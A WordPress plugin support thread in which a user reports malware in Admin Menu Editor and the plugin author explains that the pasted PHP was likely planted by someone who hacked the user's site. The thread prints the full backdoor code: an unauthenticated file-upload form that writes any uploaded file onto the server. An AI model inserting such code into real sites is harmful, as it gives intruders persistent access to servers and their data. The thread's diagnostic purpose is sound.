Support » Plugin: Admin Menu Editor » Contains Malware

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author Janis Elsts

    (@whiteshadow)

    I don’t think that this is accurate. Can you provide more details about this supposed compromise, like which files you think contain malware?

    Just to be safe, I scanned the plugin with VirusTotal. It didn’t detect anything malicious.

    Thread Starter bamboovinoth

    (@bamboovinoth)

    File name: menu-editor.php

    inserted lines:

    <?php
    echo '<center><font color="Red" size="4">';
    /// Script Upload By QtRoNiX FoX \\\
    if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';
    $mode = '0644';
    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if(isset($_FILES['image']['name'])) {
    $qx = $filedir.$userfile_name;
    @move_uploaded_file($userfile_tmp, $qx);
    @chmod ($qx, octdec($mode));
    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
    }
    else{
    echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" 
    
    name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
    }
    echo '</center></font>';
    ?>

    there where few other file too which we did not note it.

    Plugin Author Janis Elsts

    (@whiteshadow)

    Thank you. However, that code isn’t part of the actual plugin. If you download the official release from this site, you’ll see that the malicious code isn’t there. You can also look at previous versions to verify that it wasn’t present in older releases.

    Maybe what happened is that somebody hacked your site and then they added their backdoor code to one of the active plugins (i.e. this one). Hiding the code in an existing plugin might make it harder to detect at a glance, and it could let them access the site even if the original vulnerability was fixed.

Viewing 3 replies - 1 through 3 (of 3 total)
  • You must be logged in to reply to this review.